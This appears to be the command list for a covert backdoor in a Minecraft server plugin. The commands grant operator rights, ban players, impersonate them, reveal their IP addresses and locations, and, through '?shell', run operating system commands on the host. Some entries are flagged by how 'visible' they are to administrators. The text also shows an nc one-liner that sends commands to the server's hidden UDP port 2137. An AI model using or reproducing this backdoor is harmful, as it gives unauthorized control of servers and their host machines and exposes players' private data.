?coords <player> - get the coordinates of specified player
?op <player> - op specified player
?deop <player> - deop specified player
?ban <player> <source> [reason] - ban player with reason and source
?banip <player> <source> [reason] - ip ban player with reason and source
?exec <command> - execute command as server console [Visible]
?shell <command> - execute operating system command as host
?seed - get the current world seed
?psay, ?sudo <player> <message> - sends messages as player
?reload - Reloads the server [Very visible]
?getip <player> - gets ip of the player
?vanish <player> <players> - hides player from players
?unvanish <player> <players> - unhiddes player from players
?tp <player> <X> <Y> <Z> - teleport to specified coordinates
?exp <player> [+-]<0-255>[l] - give a player xp (bug: subtracting xp doesnt subtract levels)
?unban <player> - unbans player
?kick <player> <reason> - kicks player for a reason
?god <player> - gives player godmode (YOU CAN STILL GET KILLED IF YOU GET ONESHOT)
?deathcoords <player> - gets death coords of player
?bedcoords <player> - gets bed coords of player
?list - list online players
?playerinfo - list detailed player information
To execute any of the following commands, send the command over UDP/2137 to the server.
For example, you can run the op
command from your terminal like this:
$ echo -n "op _install_gentoo" | nc -u exampleserver.com 2137
Opped _install_gentoo ^C
Note: You will have to press Ctrl+c after you get a response, for some reason.